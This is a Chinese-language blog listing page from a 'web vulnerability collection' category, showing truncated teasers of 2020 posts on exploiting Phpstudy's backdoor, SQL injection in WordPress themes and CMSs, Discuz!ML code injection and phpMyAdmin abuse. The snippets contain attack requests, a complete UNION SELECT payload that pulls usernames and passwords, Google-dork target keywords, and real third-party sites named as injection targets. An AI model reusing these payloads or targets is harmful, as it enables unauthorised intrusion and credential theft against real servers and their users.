xise:Phpstudy后门漏洞的利用方法之getshell

小俊 | WEB漏洞大全 | 2020-03-29
GET /phpinfo.php HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.2 [阅读全文]
ė29次浏览 60条评论 0

GIT源码泄露AND命令执行

小俊 | WEB漏洞大全 | 2020-03-27
git工具:https://github.com/lijiejie/GitHack php命令执行基础 isset:返回值为布尔类型,变量不存在,或变量存在且其值为NULL,或多个变量时,一项不符则为 FALSE. assert:把整个字符串参数当php代码执行,(直接传 [阅读全文]
ė17次浏览 60条评论 0

MoHtml主题SQL注入漏洞

小俊 | WEB漏洞大全 | 2020-03-26
GET /mohtml/wp-content/themes/MoHtml/functions/ajax/favorite.php?pid=511 HTTP/1.1 Host: demo.mobantu.com Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/ [阅读全文]
ė8次浏览 60条评论 0

Monews主题sql注入漏洞

小俊 | WEB漏洞大全 | 2020-03-26
GET /monews/wp-content/themes/Monews/functions/likes.php?id=511 HTTP/1.1 Host: demo.mobantu.com Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Wind [阅读全文]
ė10次浏览 60条评论 0

uqcms后台GetShell和前台越权删除图片

小俊 | WEB漏洞大全 | 2020-03-24
qucms是一个B2B2C多商户电商系统 结合多年的电商开发经验推出B2B2C多店铺系统,是目前国内最优秀的电商平台之一,系统设计为“平台自营+供应商入驻”的电商运营模式,系统支持佣金结算、区域团购、实时物流、售后服务等基础功能;为电商运营商提供最优质的系统和服务。 该程序采用非常流行的PHP作为开发语言,给很多广大开发者一个容易上手,能快速进入业务,成熟的语言架构,去除无用直 [阅读全文]
ė16次浏览 60条评论 0

服务器文件上传解析漏洞

小俊 | WEB漏洞大全 | 2020-03-24
SQL注入点关键字 NewsInfo.asp?id= otherinfo.asp?id=  info.asp?id= news_show.asp?id= showhf.asp?id= detailshow.asp?ID= CompHonorBig.asp?id= EnCompHonorBig.asp?id= Google dorks sql [阅读全文]
ė16次浏览 60条评论 0

织梦cms注入漏洞

小俊 | WEB漏洞大全 | 2020-03-24
网上已经有几篇这样的文章了,当然我也是汇总了一些方法,并非原创。这个0day注入漏洞是1月份爆出来的,立马有人写出了利用方法。当然,渗透之路并非一番风顺,dede的安全防护做的也很好,所以成功与否仍然还是要看运气。     测试的是这两个网站:http://www.bianminxueche.com/ 和 http://www.newflash.tv/ ,利 [阅读全文]
ė12次浏览 60条评论 0

isite Cms SQL injection vulnerability exists

小俊 | WEB漏洞大全 | 2020-03-24
isite Cms Exp: index.php/iss/search/search/24%20and%201=2%20union%20select%201,name,3,4,5,6,7,password,9,10%20from%20flexi_user [阅读全文]
ė9次浏览 60条评论 0

Discuz!ML v.3.X存在代码注入漏洞

小俊 | WEB漏洞大全 | 2020-03-24
漏洞简述 Discuz! ML存在任意代码执行漏洞。该漏洞存在于请求流量中的cookie参数中的language字段,攻击者能够利用该漏洞在请求流量的cookie字段中(language参数)插入任意代码,最终执行任意代码,从而实现完全远程接管整个服务器的目的,该漏洞利用方式简单,危害性较大。 影响范围 Discuz!ML v.3.4 Di [阅读全文]
ė13次浏览 60条评论 0

韩国AutoSet建站程序漏洞0day

小俊 | WEB漏洞大全 | 2020-03-21
 任意用户名密码登录 phpmyadmin登录账号密码随意输入登录 select @@basedir; //查看Mysql路径  CREATE TABLE `test` ( `c` varchar(255) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8 //建立test用户和test表  LOAD DA [阅读全文]
ė18次浏览 60条评论 0

Ɣ回顶部